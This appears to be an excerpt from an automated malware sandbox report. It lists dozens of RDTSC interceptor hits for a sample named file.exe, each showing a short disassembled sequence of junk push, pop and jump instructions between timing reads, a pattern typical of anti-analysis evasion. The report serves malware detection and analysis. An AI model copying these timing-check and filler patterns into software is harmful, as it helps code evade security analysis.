Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6C5F9 second address: C6C5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB69CF second address: CB69D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB6B55 second address: CB6B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB6CB7 second address: CB6CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB6F6E second address: CB6F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB6F74 second address: CB6F97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F68950EC3BEh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jno 00007F68950EC3B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB6F97 second address: CB6FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F68950E7986h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB6FA1 second address: CB6FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F68950EC3BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBA8A5 second address: CBA8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAA4B second address: CBAA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F68950EC3BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAA5D second address: CBAAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E7999h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jg 00007F68950E7986h 0x00000013 jmp 00007F68950E7991h 0x00000018 je 00007F68950E7986h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAAA0 second address: CBAAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAAA4 second address: CBAAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAC1A second address: CBAC22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAC22 second address: CBAC43 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F68950E798Ch 0x00000008 push esi 0x00000009 jc 00007F68950E7986h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAC43 second address: CBAC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F68950EC3B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CBAC52 second address: CBAC72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7997h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CC55C8 second address: CC55DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jng 00007F68950EC3B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC55DA second address: CC55DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC55DE second address: CC55E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC55E7 second address: CC55F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3664 second address: CC3673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3673 second address: CC3679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3679 second address: CC36B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F68950EC3C5h 0x0000000c jmp 00007F68950EC3C7h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC37E4 second address: CC37E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC37E8 second address: CC380F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C8h 0x00000007 jo 00007F68950EC3B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC380F second address: CC3815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A96 second address: CC3A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A9C second address: CC3AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3AA0 second address: CC3AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F68950EC3BFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3AC0 second address: CC3AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D6A second address: CC3D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D70 second address: CC3D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F68950E798Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D84 second address: CC3D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F68950EC3BFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D9A second address: CC3D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC404B second address: CC4051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4051 second address: CC407E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F68950E7990h 0x0000000b jmp 00007F68950E7997h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC407E second address: CC40B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F68950EC3C3h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F68950EC3BAh 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007F68950EC3B6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC40B4 second address: CC40B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC40B8 second address: CC40BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC43E0 second address: CC43E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC43E6 second address: CC43F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F68950EC3B6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC46B4 second address: CC46C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC46C0 second address: CC46C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC49E3 second address: CC49F5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F68950E7988h 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F68950E7992h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC49F5 second address: CC4A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F68950EC3B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F68950EC3BDh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4CEB second address: CC4CF1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4CF1 second address: CC4D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950EC3BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4FFF second address: CC500A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC52FB second address: CC5322 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F68950EC3B6h 0x00000008 jbe 00007F68950EC3B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F68950EC3BFh 0x00000017 jg 00007F68950EC3B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5322 second address: CC5328 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5328 second address: CC532E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6BB1 second address: CC6BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA97E second address: CCA98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F68950EC3BCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA98A second address: CCA994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA994 second address: CCA998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9C4C second address: CC9C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7996h 0x00000007 pushad 0x00000008 jc 00007F68950E7986h 0x0000000e je 00007F68950E7986h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9DAF second address: CC9DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 ja 00007F68950EC3C2h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA061 second address: CCA093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E798Eh 0x00000009 popad 0x0000000a push ebx 0x0000000b jno 00007F68950E7986h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 jne 00007F68950E7998h 0x0000001b js 00007F68950E7992h 0x00000021 je 00007F68950E7986h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA1C9 second address: CCA1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F68950EC3C1h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA369 second address: CCA36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA49C second address: CCA4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3BFh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007F68950EC3B6h 0x00000016 popad 0x00000017 js 00007F68950EC3BCh 0x0000001d jp 00007F68950EC3B6h 0x00000023 pushad 0x00000024 je 00007F68950EC3B6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA69B second address: CCA69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B2E second address: CD6B36 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B36 second address: CD6B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F68950E7986h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B42 second address: CD6B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F51 second address: CD6F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F55 second address: CD6F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F5B second address: CD6F6E instructions: 0x00000000 rdtsc 0x00000002 je 00007F68950E798Eh 0x00000008 jnp 00007F68950E7986h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F6E second address: CD6F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD721C second address: CD7221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7221 second address: CD7227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7227 second address: CD724A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E7993h 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007F68950E7986h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7C57 second address: CD7C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD83F8 second address: CD841C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F68950E7995h 0x0000000b popad 0x0000000c jp 00007F68950E7988h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD841C second address: CD843E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F68950EC3BEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F68950EC3BBh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD843E second address: CD8455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F68950E798Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8455 second address: CD845B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD62B5 second address: CD62C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F68950E7988h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDFF5 second address: CDDFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDFFF second address: CDE003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3FE5 second address: CE3FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3FEA second address: CE3FEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3FEF second address: CE4015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F68950EC3BCh 0x0000000b jg 00007F68950EC3B6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F68950EC3C1h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECF21 second address: CECF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F68950E798Fh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007F68950E7986h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0292E second address: D02938 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F68950EC3B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C6C4 second address: D0C6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0C0 second address: D0B0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0C4 second address: D0B0E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F68950E7998h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0E4 second address: D0B0E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0E9 second address: D0B107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E7995h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B3DE second address: D0B3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B576 second address: D0B596 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F68950E7986h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F68950E798Ah 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B869 second address: D0B89F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C4h 0x00000007 jmp 00007F68950EC3C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B89F second address: D0B8BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7992h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
